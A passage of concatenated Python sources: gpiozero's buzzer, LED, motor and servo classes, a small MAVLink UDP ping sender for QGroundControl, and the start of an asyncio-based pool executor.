The tone which is represented the device's middle value (0). The
default is "A4" (MIDI note 69).
:param int octaves:
The number of octaves to allow away from the base note. The default is
1, meaning a value of -1 goes one octave below the base note, and one
above, i.e. from A3 to A5 with the default base note of A4.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
.. note::
Note that this class does not currently work with
:class:`~gpiozero.pins.pigpio.PiGPIOFactory`.
"""
def __init__(self, pin=None, initial_value=None, mid_tone=Tone("A4"),
octaves=1, pin_factory=None):
self._mid_tone = None
super(TonalBuzzer, self).__init__(
pwm_device=PWMOutputDevice(
pin=pin, pin_factory=pin_factory
), pin_factory=pin_factory)
try:
self._mid_tone = Tone(mid_tone)
if not (0 < octaves <= 9):
raise ValueError('octaves must be between 1 and 9')
self._octaves = octaves
try:
self.min_tone.note
except ValueError:
raise ValueError(
'%r is too low for %d octaves' %
(self._mid_tone, self._octaves))
try:
self.max_tone.note
except ValueError:
raise ValueError(
'%r is too high for %d octaves' %
(self._mid_tone, self._octaves))
self.value = initial_value
except:
self.close()
raise
def __repr__(self):
try:
if self.value is None:
return '<gpiozero.TonalBuzzer object on pin %r, silent>' % (
self.pwm_device.pin,)
else:
return '<gpiozero.TonalBuzzer object on pin %r, playing %s>' % (
self.pwm_device.pin, self.tone.note)
except:
return super(TonalBuzzer, self).__repr__()
def play(self, tone):
"""
Play the given *tone*. This can either be an instance of
:class:`~gpiozero.tones.Tone` or can be anything that could be used to
construct an instance of :class:`~gpiozero.tones.Tone`.
For example::
>>> from gpiozero import TonalBuzzer
>>> from gpiozero.tones import Tone
>>> b = TonalBuzzer(17)
>>> b.play(Tone("A4"))
>>> b.play(Tone(220.0)) # Hz
>>> b.play(Tone(60)) # middle C in MIDI notation
>>> b.play("A4")
>>> b.play(220.0)
>>> b.play(60)
"""
if tone is None:
self.value = None
else:
if not isinstance(tone, Tone):
tone = Tone(tone)
freq = tone.frequency
if self.min_tone.frequency <= tone <= self.max_tone.frequency:
self.pwm_device.pin.frequency = freq
self.pwm_device.value = 0.5
else:
raise ValueError("tone is out of the device's range")
def stop(self):
"""
Turn the buzzer off. This is equivalent to setting :attr:`value` to
:data:`None`.
"""
self.value = None
@property
def tone(self):
"""
Returns the :class:`~gpiozero.tones.Tone` that the buzzer is currently
playing, or :data:`None` if the buzzer is silent. This property can
also be set to play the specified tone.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
return Tone.from_frequency(self.pwm_device.pin.frequency)
@tone.setter
def tone(self, value):
self.play(value)
@property
def value(self):
"""
Represents the state of the buzzer as a value between -1 (representing
the minimum tone) and 1 (representing the maximum tone). This can also
be the special value :data:`None` indicating that the buzzer is
currently silent.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
try:
return log2(
self.pwm_device.pin.frequency / self.mid_tone.frequency
) / self.octaves
except ZeroDivisionError:
return 0.0
@value.setter
def value(self, value):
if value is None:
self.pwm_device.pin.frequency = None
elif -1 <= value <= 1:
freq = self.mid_tone.frequency * 2 ** (self.octaves * value)
self.pwm_device.pin.frequency = freq
self.pwm_device.value = 0.5
else:
raise OutputDeviceBadValue(
'TonalBuzzer value must be between -1 and 1, or None')
@property
def is_active(self):
"""
Returns :data:`True` if the buzzer is currently playing, otherwise
:data:`False`.
"""
return self.value is not None
@property
def octaves(self):
"""
The number of octaves available (above and below mid_tone).
"""
return self._octaves
@property
def min_tone(self):
"""
The lowest tone that the buzzer can play, i.e. the tone played
when :attr:`value` is -1.
"""
return self._mid_tone.down(12 * self.octaves)
@property
def mid_tone(self):
"""
The middle tone available, i.e. the tone played when :attr:`value` is
0.
"""
return self._mid_tone
@property
def max_tone(self):
"""
The highest tone that the buzzer can play, i.e. the tone played when
:attr:`value` is 1.
"""
return self._mid_tone.up(12 * self.octaves)
class PWMLED(PWMOutputDevice):
"""
Extends :class:`PWMOutputDevice` and represents a light emitting diode
(LED) with variable brightness.
A typical configuration of such a device is to connect a GPIO pin to the
anode (long leg) of the LED, and the cathode (short leg) to ground, with
an optional resistor to prevent the LED from burning out.
:type pin: int or str
:param pin:
The GPIO pin which the LED is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:param float initial_value:
If ``0`` (the default), the LED will be off initially. Other values
between 0 and 1 can be specified as an initial brightness for the LED.
Note that :data:`None` cannot be specified (unlike the parent class) as
there is no way to tell PWM not to alter the state of the pin.
:param int frequency:
The frequency (in Hz) of pulses emitted to drive the LED. Defaults
to 100Hz.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
PWMLED.is_lit = PWMLED.is_active
class RGBLED(SourceMixin, Device):
"""
Extends :class:`Device` and represents a full color LED component (composed
of red, green, and blue LEDs).
Connect the common cathode (longest leg) to a ground pin; connect each of
the other legs (representing the red, green, and blue anodes) to any GPIO
pins. You should use three limiting resistors (one per anode).
The following code will make the LED yellow::
from gpiozero import RGBLED
led = RGBLED(2, 3, 4)
led.color = (1, 1, 0)
The `colorzero`_ library is also supported::
from gpiozero import RGBLED
from colorzero import Color
led = RGBLED(2, 3, 4)
led.color = Color('yellow')
:type red: int or str
:param red:
The GPIO pin that controls the red component of the RGB LED. See
:ref:`pin-numbering` for valid pin numbers. If this is :data:`None` a
:exc:`GPIODeviceError` will be raised.
:type green: int or str
:param green:
The GPIO pin that controls the green component of the RGB LED.
:type blue: int or str
:param blue:
The GPIO pin that controls the blue component of the RGB LED.
:param bool active_high:
Set to :data:`True` (the default) for common cathode RGB LEDs. If you
are using a common anode RGB LED, set this to :data:`False`.
:type initial_value: ~colorzero.Color or tuple
:param initial_value:
The initial color for the RGB LED. Defaults to black ``(0, 0, 0)``.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMLED` instances for
each component of the RGBLED. If :data:`False`, construct regular
:class:`LED` instances, which prevents smooth color graduations.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
.. _colorzero: https://colorzero.readthedocs.io/
"""
def __init__(
self, red=None, green=None, blue=None, active_high=True,
initial_value=(0, 0, 0), pwm=True, pin_factory=None):
self._leds = ()
self._blink_thread = None
if not all(p is not None for p in [red, green, blue]):
raise GPIOPinMissing('red, green, and blue pins must be provided')
LEDClass = PWMLED if pwm else LED
super(RGBLED, self).__init__(pin_factory=pin_factory)
self._leds = tuple(
LEDClass(pin, active_high, pin_factory=pin_factory)
for pin in (red, green, blue)
)
self.value = initial_value
def close(self):
if getattr(self, '_leds', None):
self._stop_blink()
for led in self._leds:
led.close()
self._leds = ()
super(RGBLED, self).close()
@property
def closed(self):
return len(self._leds) == 0
@property
def value(self):
"""
Represents the color of the LED as an RGB 3-tuple of ``(red, green,
blue)`` where each value is between 0 and 1 if *pwm* was :data:`True`
when the class was constructed (and only 0 or 1 if not).
For example, red would be ``(1, 0, 0)`` and yellow would be ``(1, 1,
0)``, while orange would be ``(1, 0.5, 0)``.
"""
return tuple(led.value for led in self._leds)
@value.setter
def value(self, value):
for component in value:
if not 0 <= component <= 1:
raise OutputDeviceBadValue(
'each RGB color component must be between 0 and 1')
if isinstance(self._leds[0], LED):
if component not in (0, 1):
raise OutputDeviceBadValue(
'each RGB color component must be 0 or 1 with non-PWM '
'RGBLEDs')
self._stop_blink()
for led, v in zip(self._leds, value):
led.value = v
@property
def is_active(self):
"""
Returns :data:`True` if the LED is currently active (not black) and
:data:`False` otherwise.
"""
return self.value != (0, 0, 0)
is_lit = is_active
@property
def color(self):
"""
Represents the color of the LED as a :class:`~colorzero.Color` object.
"""
return Color(*self.value)
@color.setter
def color(self, value):
self.value = value
@property
def red(self):
"""
Represents the red element of the LED as a :class:`~colorzero.Red`
object.
"""
return self.color.red
@red.setter
def red(self, value):
self._stop_blink()
r, g, b = self.value
self.value = value, g, b
@property
def green(self):
"""
Represents the green element of the LED as a :class:`~colorzero.Green`
object.
"""
return self.color.green
@green.setter
def green(self, value):
self._stop_blink()
r, g, b = self.value
self.value = r, value, b
@property
def blue(self):
"""
Represents the blue element of the LED as a :class:`~colorzero.Blue`
object.
"""
return self.color.blue
@blue.setter
def blue(self, value):
self._stop_blink()
r, g, b = self.value
self.value = r, g, value
def on(self):
"""
Turn the LED on. This equivalent to setting the LED color to white
``(1, 1, 1)``.
"""
self.value = (1, 1, 1)
def off(self):
"""
Turn the LED off. This is equivalent to setting the LED color to black
``(0, 0, 0)``.
"""
self.value = (0, 0, 0)
def toggle(self):
"""
Toggle the state of the device. If the device is currently off
(:attr:`value` is ``(0, 0, 0)``), this changes it to "fully" on
(:attr:`value` is ``(1, 1, 1)``). If the device has a specific color,
this method inverts the color.
"""
r, g, b = self.value
self.value = (1 - r, 1 - g, 1 - b)
def blink(
self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0,
on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 0. Must be 0 if
*pwm* was :data:`False` when the class was constructed
(:exc:`ValueError` will be raised if not).
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 0. Must be 0 if
*pwm* was :data:`False` when the class was constructed
(:exc:`ValueError` will be raised if not).
:type on_color: ~colorzero.Color or tuple
:param on_color:
The color to use when the LED is "on". Defaults to white.
:type off_color: ~colorzero.Color or tuple
:param off_color:
The color to use when the LED is "off". Defaults to black.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
if isinstance(self._leds[0], LED):
if fade_in_time:
raise ValueError('fade_in_time must be 0 with non-PWM RGBLEDs')
if fade_out_time:
raise ValueError('fade_out_time must be 0 with non-PWM RGBLEDs')
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device,
args=(
on_time, off_time, fade_in_time, fade_out_time,
on_color, off_color, n
)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def pulse(
self, fade_in_time=1, fade_out_time=1,
on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True):
"""
Make the device fade in and out repeatedly.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 1.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 1.
:type on_color: ~colorzero.Color or tuple
:param on_color:
The color to use when the LED is "on". Defaults to white.
:type off_color: ~colorzero.Color or tuple
:param off_color:
The color to use when the LED is "off". Defaults to black.
:type n: int or None
:param n:
Number of times to pulse; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue pulsing and return immediately. If :data:`False`, only
return when the pulse is finished (warning: the default value of
*n* will result in this method never returning).
"""
on_time = off_time = 0
self.blink(
on_time, off_time, fade_in_time, fade_out_time,
on_color, off_color, n, background
)
def _stop_blink(self, led=None):
# If this is called with a single led, we stop all blinking anyway
if self._blink_thread:
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(
self, on_time, off_time, fade_in_time, fade_out_time, on_color,
off_color, n, fps=25):
# Define a simple lambda to perform linear interpolation between
# off_color and on_color
lerp = lambda t, fade_in: tuple(
(1 - t) * off + t * on
if fade_in else
(1 - t) * on + t * off
for off, on in zip(off_color, on_color)
)
sequence = []
if fade_in_time > 0:
sequence += [
(lerp(i * (1 / fps) / fade_in_time, True), 1 / fps)
for i in range(int(fps * fade_in_time))
]
sequence.append((on_color, on_time))
if fade_out_time > 0:
sequence += [
(lerp(i * (1 / fps) / fade_out_time, False), 1 / fps)
for i in range(int(fps * fade_out_time))
]
sequence.append((off_color, off_time))
sequence = (
cycle(sequence) if n is None else
chain.from_iterable(repeat(sequence, n))
)
for l in self._leds:
l._controller = self
for value, delay in sequence:
for l, v in zip(self._leds, value):
l._write(v)
if self._blink_thread.stopping.wait(delay):
break
class Motor(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a generic motor
connected to a bi-directional motor driver circuit (i.e. an `H-bridge`_).
Attach an `H-bridge`_ motor controller to your Pi; connect a power source
(e.g. a battery pack or the 5V pin) to the controller; connect the outputs
of the controller board to the two terminals of the motor; connect the
inputs of the controller board to two GPIO pins.
.. _H-bridge: https://en.wikipedia.org/wiki/H_bridge
The following code will make the motor turn "forwards"::
from gpiozero import Motor
motor = Motor(17, 18)
motor.forward()
:type forward: int or str
:param forward:
The GPIO pin that the forward input of the motor driver chip is
connected to. See :ref:`pin-numbering` for valid pin numbers. If this
is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type backward: int or str
:param backward:
The GPIO pin that the backward input of the motor driver chip is
connected to. See :ref:`pin-numbering` for valid pin numbers. If this
is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type enable: int or str or None
:param enable:
The GPIO pin that enables the motor. Required for *some* motor
controller boards. See :ref:`pin-numbering` for valid pin numbers.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMOutputDevice`
instances for the motor controller pins, allowing both direction and
variable speed control. If :data:`False`, construct
:class:`DigitalOutputDevice` instances, allowing only direction
control.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(self, forward=None, backward=None, enable=None, pwm=True,
pin_factory=None):
if not all(p is not None for p in [forward, backward]):
raise GPIOPinMissing(
'forward and backward pins must be provided'
)
PinClass = PWMOutputDevice if pwm else DigitalOutputDevice
devices = OrderedDict((
('forward_device', PinClass(forward)),
('backward_device', PinClass(backward)),
))
if enable is not None:
devices['enable_device'] = DigitalOutputDevice(enable,
initial_value=True)
super(Motor, self).__init__(_order=devices.keys(), **devices)
@property
def value(self):
"""
Represents the speed of the motor as a floating point value between -1
(full speed backward) and 1 (full speed forward), with 0 representing
stopped.
"""
return self.forward_device.value - self.backward_device.value
@value.setter
def value(self, value):
if not -1 <= value <= 1:
raise OutputDeviceBadValue("Motor value must be between -1 and 1")
if value > 0:
try:
self.forward(value)
except ValueError as e:
raise OutputDeviceBadValue(e)
elif value < 0:
try:
self.backward(-value)
except ValueError as e:
raise OutputDeviceBadValue(e)
else:
self.stop()
@property
def is_active(self):
"""
Returns :data:`True` if the motor is currently running and
:data:`False` otherwise.
"""
return self.value != 0
def forward(self, speed=1):
"""
Drive the motor forwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed) if *pwm* was
:data:`True` when the class was constructed (and only 0 or 1 if
not).
"""
if not 0 <= speed <= 1:
raise ValueError('forward speed must be between 0 and 1')
if isinstance(self.forward_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'forward speed must be 0 or 1 with non-PWM Motors')
self.backward_device.off()
self.forward_device.value = speed
def backward(self, speed=1):
"""
Drive the motor backwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed) if *pwm* was
:data:`True` when the class was constructed (and only 0 or 1 if
not).
"""
if not 0 <= speed <= 1:
raise ValueError('backward speed must be between 0 and 1')
if isinstance(self.backward_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'backward speed must be 0 or 1 with non-PWM Motors')
self.forward_device.off()
self.backward_device.value = speed
def reverse(self):
"""
Reverse the current direction of the motor. If the motor is currently
idle this does nothing. Otherwise, the motor's direction will be
reversed at the current speed.
"""
self.value = -self.value
def stop(self):
"""
Stop the motor.
"""
self.forward_device.off()
self.backward_device.off()
class PhaseEnableMotor(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a generic motor connected
to a Phase/Enable motor driver circuit; the phase of the driver controls
whether the motor turns forwards or backwards, while enable controls the
speed with PWM.
The following code will make the motor turn "forwards"::
from gpiozero import PhaseEnableMotor
motor = PhaseEnableMotor(12, 5)
motor.forward()
:type phase: int or str
:param phase:
The GPIO pin that the phase (direction) input of the motor driver chip
is connected to. See :ref:`pin-numbering` for valid pin numbers. If
this is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type enable: int or str
:param enable:
The GPIO pin that the enable (speed) input of the motor driver chip
is connected to. See :ref:`pin-numbering` for valid pin numbers. If
this is :data:`None` a :exc:`GPIODeviceError` will be raised.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMOutputDevice`
instances for the motor controller pins, allowing both direction and
variable speed control. If :data:`False`, construct
:class:`DigitalOutputDevice` instances, allowing only direction
control.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(self, phase=None, enable=None, pwm=True, pin_factory=None):
if not all([phase, enable]):
raise GPIOPinMissing('phase and enable pins must be provided')
PinClass = PWMOutputDevice if pwm else DigitalOutputDevice
super(PhaseEnableMotor, self).__init__(
phase_device=DigitalOutputDevice(phase, pin_factory=pin_factory),
enable_device=PinClass(enable, pin_factory=pin_factory),
_order=('phase_device', 'enable_device'),
pin_factory=pin_factory
)
@property
def value(self):
"""
Represents the speed of the motor as a floating point value between -1
(full speed backward) and 1 (full speed forward).
"""
return (
-self.enable_device.value
if self.phase_device.is_active else
self.enable_device.value
)
@value.setter
def value(self, value):
if not -1 <= value <= 1:
raise OutputDeviceBadValue("Motor value must be between -1 and 1")
if value > 0:
self.forward(value)
elif value < 0:
self.backward(-value)
else:
self.stop()
@property
def is_active(self):
"""
Returns :data:`True` if the motor is currently running and
:data:`False` otherwise.
"""
return self.value != 0
def forward(self, speed=1):
"""
Drive the motor forwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed).
"""
if isinstance(self.enable_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'forward speed must be 0 or 1 with non-PWM Motors')
self.enable_device.off()
self.phase_device.off()
self.enable_device.value = speed
def backward(self, speed=1):
"""
Drive the motor backwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed).
"""
if isinstance(self.enable_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'backward speed must be 0 or 1 with non-PWM Motors')
self.enable_device.off()
self.phase_device.on()
self.enable_device.value = speed
def reverse(self):
"""
Reverse the current direction of the motor. If the motor is currently
idle this does nothing. Otherwise, the motor's direction will be
reversed at the current speed.
"""
self.value = -self.value
def stop(self):
"""
Stop the motor.
"""
self.enable_device.off()
class Servo(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a PWM-controlled servo
motor connected to a GPIO pin.
Connect a power source (e.g. a battery pack or the 5V pin) to the power
cable of the servo (this is typically colored red); connect the ground
cable of the servo (typically colored black or brown) to the negative of
your battery pack, or a GND pin; connect the final cable (typically colored
white or orange) to the GPIO pin you wish to use for controlling the servo.
The following code will make the servo move between its minimum, maximum,
and mid-point positions with a pause between each::
from gpiozero import Servo
from time import sleep
servo = Servo(17)
while True:
servo.min()
sleep(1)
servo.mid()
sleep(1)
servo.max()
sleep(1)
:type pin: int or str
:param pin:
The GPIO pin that the servo is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_value:
If ``0`` (the default), the device's mid-point will be set initially.
Other values between -1 and +1 can be specified as an initial position.
:data:`None` means to start the servo un-controlled (see
:attr:`value`).
:param float min_pulse_width:
The pulse width corresponding to the servo's minimum position. This
defaults to 1ms.
:param float max_pulse_width:
The pulse width corresponding to the servo's maximum position. This
defaults to 2ms.
:param float frame_width:
The length of time between servo control pulses measured in seconds.
This defaults to 20ms which is a common value for servos.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, initial_value=0.0,
min_pulse_width=1/1000, max_pulse_width=2/1000,
frame_width=20/1000, pin_factory=None):
if min_pulse_width >= max_pulse_width:
raise ValueError('min_pulse_width must be less than max_pulse_width')
if max_pulse_width >= frame_width:
raise ValueError('max_pulse_width must be less than frame_width')
self._frame_width = frame_width
self._min_dc = min_pulse_width / frame_width
self._dc_range = (max_pulse_width - min_pulse_width) / frame_width
self._min_value = -1
self._value_range = 2
super(Servo, self).__init__(
pwm_device=PWMOutputDevice(
pin, frequency=int(1 / frame_width), pin_factory=pin_factory
),
pin_factory=pin_factory
)
try:
self.value = initial_value
except:
self.close()
raise
@property
def frame_width(self):
"""
The time between control pulses, measured in seconds.
"""
return self._frame_width
@property
def min_pulse_width(self):
"""
The control pulse width corresponding to the servo's minimum position,
measured in seconds.
"""
return self._min_dc * self.frame_width
@property
def max_pulse_width(self):
"""
The control pulse width corresponding to the servo's maximum position,
measured in seconds.
"""
return (self._dc_range * self.frame_width) + self.min_pulse_width
@property
def pulse_width(self):
"""
Returns the current pulse width controlling the servo.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
return self.pwm_device.pin.state * self.frame_width
def min(self):
"""
Set the servo to its minimum position.
"""
self.value = -1
def mid(self):
"""
Set the servo to its mid-point position.
"""
self.value = 0
def max(self):
"""
Set the servo to its maximum position.
"""
self.value = 1
def detach(self):
"""
Temporarily disable control of the servo. This is equivalent to
setting :attr:`value` to :data:`None`.
"""
self.value = None
def _get_value(self):
if self.pwm_device.pin.frequency is None:
return None
else:
return (
((self.pwm_device.pin.state - self._min_dc) / self._dc_range) *
self._value_range + self._min_value)
@property
def value(self):
"""
Represents the position of the servo as a value between -1 (the minimum
position) and +1 (the maximum position). This can also be the special
value :data:`None` indicating that the servo is currently
"uncontrolled", i.e. that no control signal is being sent. Typically
this means the servo's position remains unchanged, but that it can be
moved by hand.
"""
result = self._get_value()
if result is None:
return result
else:
# NOTE: This round() only exists to ensure we don't confuse people
# by returning 2.220446049250313e-16 as the default initial value
# instead of 0. The reason _get_value and _set_value are split
# out is for descendents that require the un-rounded values for
# accuracy
return round(result, 14)
@value.setter
def value(self, value):
if value is None:
self.pwm_device.pin.frequency = None
elif -1 <= value <= 1:
self.pwm_device.pin.frequency = int(1 / self.frame_width)
self.pwm_device.pin.state = (
self._min_dc + self._dc_range *
((value - self._min_value) / self._value_range)
)
else:
raise OutputDeviceBadValue(
"Servo value must be between -1 and 1, or None")
@property
def is_active(self):
return self.value is not None
class AngularServo(Servo):
"""
Extends :class:`Servo` and represents a rotational PWM-controlled servo
motor which can be set to particular angles (assuming valid minimum and
maximum angles are provided to the constructor).
Connect a power source (e.g. a battery pack or the 5V pin) to the power
cable of the servo (this is typically colored red); connect the ground
cable of the servo (typically colored black or brown) to the negative of
your battery pack, or a GND pin; connect the final cable (typically colored
white or orange) to the GPIO pin you wish to use for controlling the servo.
Next, calibrate the angles that the servo can rotate to. In an interactive
Python session, construct a :class:`Servo` instance. The servo should move
to its mid-point by default. Set the servo to its minimum value, and
measure the angle from the mid-point. Set the servo to its maximum value,
and again measure the angle::
>>> from gpiozero import Servo
>>> s = Servo(17)
>>> s.min() # measure the angle
>>> s.max() # measure the angle
You should now be able to construct an :class:`AngularServo` instance
with the correct bounds::
>>> from gpiozero import AngularServo
>>> s = AngularServo(17, min_angle=-42, max_angle=44)
>>> s.angle = 0.0
>>> s.angle
0.0
>>> s.angle = 15
>>> s.angle
15.0
.. note::
You can set *min_angle* greater than *max_angle* if you wish to reverse
the sense of the angles (e.g. ``min_angle=45, max_angle=-45``). This
can be useful with servos that rotate in the opposite direction to your
expectations of minimum and maximum.
:type pin: int or str
:param pin:
The GPIO pin that the servo is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_angle:
Sets the servo's initial angle to the specified value. The default is
0. The value specified must be between *min_angle* and *max_angle*
inclusive. :data:`None` means to start the servo un-controlled (see
:attr:`value`).
:param float min_angle:
Sets the minimum angle that the servo can rotate to. This defaults to
-90, but should be set to whatever you measure from your servo during
calibration.
:param float max_angle:
Sets the maximum angle that the servo can rotate to. This defaults to
90, but should be set to whatever you measure from your servo during
calibration.
:param float min_pulse_width:
The pulse width corresponding to the servo's minimum position. This
defaults to 1ms.
:param float max_pulse_width:
The pulse width corresponding to the servo's maximum position. This
defaults to 2ms.
:param float frame_width:
The length of time between servo control pulses measured in seconds.
This defaults to 20ms which is a common value for servos.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, initial_angle=0.0,
min_angle=-90, max_angle=90,
min_pulse_width=1/1000, max_pulse_width=2/1000,
frame_width=20/1000, pin_factory=None):
self._min_angle = min_angle
self._angular_range = max_angle - min_angle
if initial_angle is None:
initial_value = None
elif ((min_angle <= initial_angle <= max_angle) or
(max_angle <= initial_angle <= min_angle)):
initial_value = 2 * ((initial_angle - min_angle) / self._angular_range) - 1
else:
raise OutputDeviceBadValue(
"AngularServo angle must be between %s and %s, or None" %
(min_angle, max_angle))
super(AngularServo, self).__init__(
pin, initial_value, min_pulse_width, max_pulse_width, frame_width,
pin_factory=pin_factory
)
@property
def min_angle(self):
"""
The minimum angle that the servo will rotate to when :meth:`min` is
called.
"""
return self._min_angle
@property
def max_angle(self):
"""
The maximum angle that the servo will rotate to when :meth:`max` is
called.
"""
return self._min_angle + self._angular_range
@property
def angle(self):
"""
The position of the servo as an angle measured in degrees. This will
only be accurate if :attr:`min_angle` and :attr:`max_angle` have been
set appropriately in the constructor.
This can also be the special value :data:`None` indicating that the
servo is currently "uncontrolled", i.e. that no control signal is being
sent. Typically this means the servo's position remains unchanged, but
that it can be moved by hand.
"""
result = self._get_value()
if result is None:
return None
else:
# NOTE: Why round(n, 12) here instead of 14? Angle ranges can be
# much larger than -1..1 so we need a little more rounding to
# smooth off the rough corners!
return round(
self._angular_range *
((result - self._min_value) / self._value_range) +
self._min_angle, 12)
@angle.setter
def angle(self, angle):
if angle is None:
self.value = None
elif ((self.min_angle <= angle <= self.max_angle) or
(self.max_angle <= angle <= self.min_angle)):
self.value = (
self._value_range *
((angle - self._min_angle) / self._angular_range) +
self._min_value)
else:
raise OutputDeviceBadValue(
"AngularServo angle must be between %s and %s, or None" %
(self.min_angle, self.max_angle))
|
sender.py
|
#!/usr/bin/python
# Testing send mavlink message
from __future__ import print_function
from threading import Thread
from time import sleep
import pymavlink.mavutil as mavutil
import sys
import time
UDP = "192.168.192.101:14550" # The IP and port of QGroundcontrol. It can't be a broadcast IP.
SOURCE_SYSTEM_ID = 99 # Me, the sender
TARGET_SYSTEM_ID = 255 # QGroundcontrol
mav = mavutil.mavlink_connection('udpout:' + UDP, source_system=SOURCE_SYSTEM_ID)
def pingloop():
i = 0
while (True):
msg = mav.mav.ping_send(int(time.time() * 1000), i, TARGET_SYSTEM_ID, 1)
i = i + 1
sleep(1)
pingthread = Thread(target=pingloop)
pingthread.daemon = True
pingthread.start()
while (True):
msg = mav.recv_match(blocking=True)
print("Message from %d: %s" % (msg.get_srcSystem(), msg))
|
async_pool_executor.py
|
import atexit
import asyncio
import threading
import time
import traceback
from threading import Thread
import nb_log # noqa
# if os.name == 'posix':
# import uvloop
#
# asyncio.set_event_loop_policy(uvloop.EventLoopPolicy()) # 打猴子补丁最好放在代码顶层,否则很大机会出问题。
"""
# 也可以采用 janus 的 线程安全的queue方式来实现异步池,此queue性能和本模块实现的生产 消费相比,性能并没有提高,所以就不重新用这这个包来实现一次了。
import janus
import asyncio
import time
import threading
import nb_log
queue = janus.Queue(maxsize=6000)
async def consume():
while 1:
# time.sleep(1)
val = await queue.async_q.get() # 这是async,不要看错了
print(val)
def push():
for i in range(50000):
# time.sleep(0.2)
# print(i)
queue.sync_q.put(i) # 这是sync。不要看错了。
if __name__ == '__main__':
threading.Thread(target=push).start()
loop = asyncio.get_event_loop()
loop.create_task(consume())
loop.run_forever()
"""
class AsyncPoolExecutor2:
def __init__(self, size, loop=None):
self._size = size
self.loop = loop or asyncio.new_event_loop()
self._sem = asyncio.Semaphore(self._size, loop=self.loop)
# atexit.register(self.shutdown)
Thread(target=self._start_loop_in_new_thread).start()
def submit(self, func, *args, **kwargs):
while self._sem.locked():
time.sleep(0.001)
asyncio.run_coroutine_threadsafe(self._run_func(func, *args, **kwargs), self.loop)
async def _run_func(self, func, *args, **kwargs):
async with self._sem:
result = await func(*args, **kwargs)
return result
def _start_loop_in_new_thread(self, ):
self.loop.run_forever()
def shutdown(self):
self.loop.stop()
self.loop.close()
class AsyncPoolExecutor(nb_log.LoggerMixin):
"""
使api和线程池一样,最好的性能做法是submit也弄成 async def,生产和消费在同一个线程同一个loop一起运行,但会对调用链路的兼容性产生破坏,从而调用方式不兼容线程池。
"""
def __init__(self, size, loop=None):
"""
:param size: 同时并发运行的协程任务数量。
:param loop:
"""
self._size = size
self.loop = loop or asyncio.new_event_loop()
self._sem = asyncio.Semaphore(self._size, loop=self.loop)
self._queue = asyncio.Queue(maxsize=size, loop=self.loop)
self._lock = threading.Lock()
t = Thread(target=self._start_loop_in_new_thread)
t.setDaemon(True) # 设置守护线程是为了有机会触发atexit,使程序自动结束,不用手动调用shutdown
t.start()
self._can_be_closed_flag = False
atexit.register(self.shutdown)
self._event = threading.Event()
# print(self._event.is_set())
self._event.set()
def submit000(self, func, *args, **kwargs):
# 这个性能比下面的采用 run_coroutine_threadsafe + result返回快了3倍多。
with self._lock:
while 1:
if not self._queue.full():
self.loop.call_soon_threadsafe(self._queue.put_nowait, (func, args, kwargs))
break
else:
time.sleep(0.01)
def submit(self, func, *args, **kwargs):
